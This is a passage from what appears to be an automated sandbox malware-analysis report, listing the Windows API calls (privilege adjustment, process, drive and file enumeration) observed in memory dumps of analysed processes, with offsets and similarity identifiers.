                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 003CABC9
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 003CBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 003CA23E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0274109E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027401D0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0274132F
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 003CA94A
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageName
                                                    • String ID:
                                                    • API String ID: 2060303382-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02740FB0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02740502
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02740640
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 003CABC9
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02741148
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 003CA39C
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0274099C
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 003CAA71
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 003CA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 003CA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2181880325.0000000002BF0000.00000040.00000040.sdmp, Offset: 02BF0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2181880325.0000000002BF0000.00000040.00000040.sdmp, Offset: 02BF0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165269916.00000000003C2000.00000040.00000001.sdmp, Offset: 003C2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165269916.00000000003C2000.00000040.00000001.sdmp, Offset: 003C2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E8AD37
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E8AD37
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E8B329
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E8B329
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028D01D0
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 028D072D
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 028D0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 028D109E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 01E8A23E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 028D0819
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 028D0502
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 028D072D
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 028D08E5
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E8A94A
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 028D0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 028D0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E8AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 028D1148
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E8BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 028D08E5
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01E8A39C
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 028D132F
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 028D0640
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E8AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01E8AA71
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 028D099C
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 028D0819
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01E8ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E8BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 01E8A23E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028D01D0
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 028D109E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 028D132F
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E8A94A
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 028D0502
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 028D0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 028D0640
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01E8ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 028D1148
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01E8A39C
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 028D099C
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01E8AA71
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01E8A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01E8A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
